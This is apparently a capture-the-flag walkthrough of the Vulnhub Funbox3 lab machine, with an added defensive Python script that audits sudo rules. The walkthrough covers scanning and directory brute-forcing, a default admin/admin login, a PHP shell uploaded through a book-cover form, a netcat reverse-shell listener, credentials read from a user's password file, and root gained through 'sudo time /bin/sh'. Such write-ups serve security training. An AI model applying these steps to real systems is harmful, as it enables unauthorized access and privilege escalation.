Funbox3

Identify the target host's IP address

┌──(kali㉿kali)-[~/Vulnhub/Funbox3]
└─$ sudo netdiscover -i eth1
3 Captured ARP Req/Rep packets, from 3 hosts.   Total size: 180
 _____________________________________________________________________________
   IP            At MAC Address     Count     Len  MAC Vendor / Hostname
 -----------------------------------------------------------------------------
 192.168.56.1    0a:00:27:00:00:0a      1      60  Unknown vendor
 192.168.56.100  08:00:27:86:52:7b      1      60  PCS Systemtechnik GmbH
 192.168.56.162  08:00:27:41:c1:af      1      60  PCS Systemtechnik GmbH

Using the netdiscover tool bundled with Kali Linux, the target host's IP address is identified as 192.168.56.162.

NMAP scan

┌──(kali㉿kali)-[~/Vulnhub/Funbox3]
└─$ sudo nmap -sS -sV -sC -p- 192.168.56.162 -oN nmap_full_scan
Starting Nmap 7.92 ( https://nmap.org ) at 2022-11-08 02:15 EST
Nmap scan report for bogon (192.168.56.162)
Host is up (0.00033s latency).
Not shown: 65532 closed tcp ports (reset)
PORT      STATE SERVICE VERSION
22/tcp    open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 b2:d8:51:6e:c5:84:05:19:08:eb:c8:58:27:13:13:2f (RSA)
|   256 b0:de:97:03:a7:2f:f4:e2:ab:4a:9c:d9:43:9b:8a:48 (ECDSA)
|_  256 9d:0f:9a:26:38:4f:01:80:a7:a6:80:9d:d1:d4:cf:ec (ED25519)
80/tcp    open  http    Apache httpd 2.4.41 ((Ubuntu))
| http-robots.txt: 1 disallowed entry 
|_gym
|_http-title: Apache2 Ubuntu Default Page: It works
|_http-server-header: Apache/2.4.41 (Ubuntu)
33060/tcp open  mysqlx?
| fingerprint-strings: 
|   DNSStatusRequestTCP, LDAPSearchReq, NotesRPC, SSLSessionReq, TLSSessionReq, X11Probe, afp: 
|     Invalid message"
|_    HY000
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
MAC Address: 08:00:27:41:C1:AF (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 23.61 seconds

Get Access

Browsing to port 80 from Kali Linux returns the Apache default page.

┌──(kali㉿kali)-[~/Vulnhub/Funbox3]
└─$ curl http://192.168.56.162/robots.txt
Disallow: gym

┌──(kali㉿kali)-[~/Vulnhub/Funbox3]
└─$ gobuster dir -u http://192.168.56.162 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt                                        
===============================================================
Gobuster v3.2.0-dev
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.56.162
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.2.0-dev
[+] Timeout:                 10s
===============================================================
2022/11/08 02:20:31 Starting gobuster in directory enumeration mode
===============================================================
/store                (Status: 301) [Size: 316] [--> http://192.168.56.162/store/]
/admin                (Status: 301) [Size: 316] [--> http://192.168.56.162/admin/]
/secret               (Status: 301) [Size: 317] [--> http://192.168.56.162/secret/]
/gym                  (Status: 301) [Size: 314] [--> http://192.168.56.162/gym/]
/server-status        (Status: 403) [Size: 279]
Progress: 219643 / 220561 (99.58%)===============================================================
2022/11/08 02:21:04 Finished
===============================================================
┌──(kali㉿kali)-[~/Vulnhub/Funbox3]
└─$ gobuster dir -u http://192.168.56.162/gym -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt 
===============================================================
Gobuster v3.2.0-dev
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.56.162/gym
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.2.0-dev
[+] Timeout:                 10s
===============================================================
2022/11/08 02:21:49 Starting gobuster in directory enumeration mode
===============================================================
/img                  (Status: 301) [Size: 318] [--> http://192.168.56.162/gym/img/]
/profile              (Status: 301) [Size: 322] [--> http://192.168.56.162/gym/profile/]
/admin                (Status: 301) [Size: 320] [--> http://192.168.56.162/gym/admin/]
/upload               (Status: 301) [Size: 321] [--> http://192.168.56.162/gym/upload/]
/include              (Status: 301) [Size: 322] [--> http://192.168.56.162/gym/include/]
/LICENSE              (Status: 200) [Size: 18025]
/att                  (Status: 301) [Size: 318] [--> http://192.168.56.162/gym/att/]
/ex                   (Status: 301) [Size: 317] [--> http://192.168.56.162/gym/ex/]
/boot                 (Status: 301) [Size: 319] [--> http://192.168.56.162/gym/boot/]
Progress: 219077 / 220561 (99.33%)===============================================================
2022/11/08 02:22:20 Finished
===============================================================

┌──(kali㉿kali)-[~/Vulnhub/Funbox3]
└─$ dirb http://192.168.56.162

-----------------
DIRB v2.22    
By The Dark Raver
-----------------

START_TIME: Tue Nov  8 02:28:34 2022
URL_BASE: http://192.168.56.162/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612

---- Scanning URL: http://192.168.56.162/ ----
==> DIRECTORY: http://192.168.56.162/admin/
+ http://192.168.56.162/index.html (CODE:200|SIZE:10918)
+ http://192.168.56.162/index.php (CODE:200|SIZE:3468)
+ http://192.168.56.162/robots.txt (CODE:200|SIZE:14)
==> DIRECTORY: http://192.168.56.162/secret/
+ http://192.168.56.162/server-status (CODE:403|SIZE:279)
==> DIRECTORY: http://192.168.56.162/store/

---- Entering directory: http://192.168.56.162/admin/ ----
==> DIRECTORY: http://192.168.56.162/admin/assets/
+ http://192.168.56.162/admin/index.php (CODE:200|SIZE:3263)

---- Entering directory: http://192.168.56.162/secret/ ----
+ http://192.168.56.162/secret/index.php (CODE:200|SIZE:108)
+ http://192.168.56.162/secret/robots.txt (CODE:200|SIZE:35)

---- Entering directory: http://192.168.56.162/store/ ----
+ http://192.168.56.162/store/admin.php (CODE:200|SIZE:3153)
==> DIRECTORY: http://192.168.56.162/store/controllers/
==> DIRECTORY: http://192.168.56.162/store/database/
==> DIRECTORY: http://192.168.56.162/store/functions/
+ http://192.168.56.162/store/index.php (CODE:200|SIZE:3998)
==> DIRECTORY: http://192.168.56.162/store/models/
==> DIRECTORY: http://192.168.56.162/store/template/

---- Entering directory: http://192.168.56.162/admin/assets/ ----

-----------------
END_TIME: Tue Nov  8 02:28:41 2022
DOWNLOADED: 18448 - FOUND: 9

The scan turns up a large number of directories; /store/database contains a username and password.

┌──(kali㉿kali)-[~/Vulnhub/Funbox3]
└─$ curl http://192.168.56.162/store/database/readme.txt.txt                  
This is an simple online web store was made by using php , mysql and bootstrap. 

the sql for database is put in folder sql. 
the database contains many tables. 

To change the localhost, username, password for connecting to database, change it only one time in 
www_project/functions/database_functions.php -> db_connect() . Simple and fast
The base is localhost , root , , www_project 

to connect the admin section, click the name Nghi Le Thanh at the bottom. 
the name and pass for log in is admin , admin. Just to make it simple. 

the 2 main things are not fully implemented is contact and process purchase. 
Due to having to work with some security and online payment, the process site is just a place holder. 

for futher questions, please let me know. my email: nghi.lethanh2@cou.fi       

Log in to /store/admin with the credentials found here: admin / admin.

Logged in successfully; click "add new book".

Can't add new data Incorrect integer value: '' for column 'publisherid' at row 1

Note the publisher field here: copy the value of an existing Publisher.

After that, shell.php uploads successfully.

So where is shell.php stored? Pick any book, locate the path of its cover image, and shell.php can be seen in the same directory:

http://192.168.56.162/store/bootstrap/img/

Shell obtained successfully.

└─$ sudo nc -nlvp 5555                                         
[sudo] password for kali: 
listening on [any] 5555 ...
connect to [192.168.56.137] from (UNKNOWN) [192.168.56.162] 42364
Linux funbox3 5.4.0-42-generic #46-Ubuntu SMP Fri Jul 10 00:24:02 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux
 07:39:53 up 30 min,  0 users,  load average: 0.00, 0.04, 0.17
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ 

cd /home
www-data@funbox3:/home$ ls -lah
ls -lah
total 12K
drwxr-xr-x  3 root root 4.0K Jul 30  2020 .
drwxr-xr-x 20 root root 4.0K Jul 30  2020 ..
drwxr-xr-x  3 tony tony 4.0K Jul 31  2020 tony
www-data@funbox3:/home$ cd tony
cd tony
www-data@funbox3:/home/tony$ ls -alh
ls -alh
total 36K
drwxr-xr-x 3 tony tony 4.0K Jul 31  2020 .
drwxr-xr-x 3 root root 4.0K Jul 30  2020 ..
-rw------- 1 tony tony   30 Jul 31  2020 .bash_history
-rw-r--r-- 1 tony tony  220 Feb 25  2020 .bash_logout
-rw-r--r-- 1 tony tony 3.7K Feb 25  2020 .bashrc
drwx------ 2 tony tony 4.0K Jul 30  2020 .cache
-rw-r--r-- 1 tony tony  807 Feb 25  2020 .profile
-rw-r--r-- 1 tony tony    0 Jul 30  2020 .sudo_as_admin_successful
-rw------- 1 tony tony 1.6K Jul 31  2020 .viminfo
-rw-rw-r-- 1 tony tony   70 Jul 31  2020 password.txt
www-data@funbox3:/home/tony$ cat passwod.txt
cat passwod.txt
cat: passwod.txt: No such file or directory
www-data@funbox3:/home/tony$ cat password.txt
cat password.txt
ssh: yxcvbnmYYY
gym/admin: asdfghjklXXX
/store: admin@admin.com admin
www-data@funbox3:/home/tony$ su - tony
su - tony
Password: yxcvbnmYYY

tony@funbox3:~$ id
id
uid=1000(tony) gid=1000(tony) groups=1000(tony),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),116(lxd)
tony@funbox3:~$ sudo -l
sudo -l
Matching Defaults entries for tony on funbox3:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User tony may run the following commands on funbox3:
    (root) NOPASSWD: /usr/bin/yelp
    (root) NOPASSWD: /usr/bin/dmf
    (root) NOPASSWD: /usr/bin/whois
    (root) NOPASSWD: /usr/bin/rlogin
    (root) NOPASSWD: /usr/bin/pkexec
    (root) NOPASSWD: /usr/bin/mtr
    (root) NOPASSWD: /usr/bin/finger
    (root) NOPASSWD: /usr/bin/time
    (root) NOPASSWD: /usr/bin/cancel
    (root) NOPASSWD:
        /root/a/b/c/d/e/f/g/h/i/j/k/l/m/n/o/q/r/s/t/u/v/w/x/y/z/.smile.sh
tony@funbox3:~$ 

There is a very obvious hint: tony's password, which lets us switch to the user tony.
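As an added defender's check (not part of the original walkthrough), this Python script parses the `sudo -l` output shown above and flags passwordless root rules worth reviewing: binaries that execute an arbitrary command by design (time, which the walkthrough uses, and pkexec), and hidden or out-of-secure_path scripts such as .smile.sh. The sample output is a constructed subset of the session above, and COMMAND_RUNNERS is an assumed minimal list.

```python
import re
from collections import namedtuple

# Constructed sample: a subset of the `sudo -l` output for tony shown in this walkthrough,
# keeping the entry whose command is wrapped onto a continuation line.
SUDO_L_OUTPUT = "\n".join([
    "Matching Defaults entries for tony on funbox3:",
    "    env_reset, mail_badpass,",
    r"    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin",
    "",
    "User tony may run the following commands on funbox3:",
    "    (root) NOPASSWD: /usr/bin/yelp",
    "    (root) NOPASSWD: /usr/bin/pkexec",
    "    (root) NOPASSWD: /usr/bin/time",
    "    (root) NOPASSWD:",
    "        /root/a/b/c/d/e/f/g/h/i/j/k/l/m/n/o/q/r/s/t/u/v/w/x/y/z/.smile.sh",
])

# Assumed list of binaries whose job is to run a caller-supplied command: a passwordless
# root rule for them is unrestricted root (time is the one the walkthrough uses).
COMMAND_RUNNERS = {"time", "pkexec"}

SudoRule = namedtuple("SudoRule", "runas tags command")

# "(runas) TAG: TAG: command" -- tags are optional, the command may be empty (wrapped).
ENTRY_RE = re.compile(r"^\s*\((?P<runas>[^)]*)\)\s*((?:[A-Z]+:\s*)*)(.*)$")

def parse_secure_path(text):
    """Directories in the Defaults secure_path; sudo -l escapes ':' as '\\:'."""
    m = re.search(r"secure_path=(\S+)", text)
    return m.group(1).replace("\\:", ":").split(":") if m else []

def parse_sudo_l(text):
    """Parse the rule lines of `sudo -l`, joining a command wrapped onto the next line."""
    lines, rules, i = text.splitlines(), [], 0
    while i < len(lines):
        m = ENTRY_RE.match(lines[i])
        i += 1
        if not m:
            continue
        tags, cmds = tuple(re.findall(r"[A-Z]+", m.group(2))), m.group(3).strip()
        if not cmds and i < len(lines):      # command wrapped onto a continuation line
            cmds, i = lines[i].strip(), i + 1
        for cmd in cmds.split(","):          # one rule line may list several commands
            rules.append(SudoRule(m.group("runas"), tags, cmd.strip()))
    return rules

def audit(rules, secure_path):
    """Return (command, reason) pairs for passwordless root rules a defender should review."""
    findings = []
    for r in rules:
        if r.runas != "root" or "NOPASSWD" not in r.tags:
            continue
        directory, _, name = r.command.rpartition("/")
        if name in COMMAND_RUNNERS:
            findings.append((r.command, "runs an arbitrary command as root without a password"))
        elif name.startswith(".") or directory not in secure_path:
            findings.append((r.command, "hidden or non-standard path; verify root ownership and that it is not writable"))
        else:
            findings.append((r.command, "passwordless root; confirm the binary cannot spawn a shell or write files"))
    return findings
```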

Privilege escalation

tony@funbox3:~$ ls /root/root.txt
ls /root/root.txt
ls: cannot access '/root/root.txt': Permission denied
tony@funbox3:~$ sudo /usr/bin/time /bin/sh
sudo /usr/bin/time /bin/sh
# id
id
uid=0(root) gid=0(root) groups=0(root)
# cd /root
cd /root
# ls
ls
root.flag  snap
# cat root.flag
cat root.flag
 __________          ___.                      ___________                     
\_   _____/_ __  ____\_ |__   _______  ___ /\  \_   _____/____    _________.__.
 |    __)|  |  \/    \| __ \ /  _ \  \/  / \/   |    __)_\__  \  /  ___<   |  |
 |     \ |  |  /   |  \ \_\ (  <_> >    <  /\   |        \/ __ \_\___ \ \___  |
 \___  / |____/|___|  /___  /\____/__/\_ \ \/  /_______  (____  /____  >/ ____|
     \/             \/    \/            \/             \/     \/     \/ \/     
                                                                        
Made with ❤ from twitter@0815R2d2. Please, share this on twitter if you want.
# 

Privilege escalation is simple: after consulting the GTFOBins site, the time command was chosen for the escalation.

Root flag obtained successfully!!!

Original article: http://www.cnblogs.com/jason-huawen/p/16870006.html
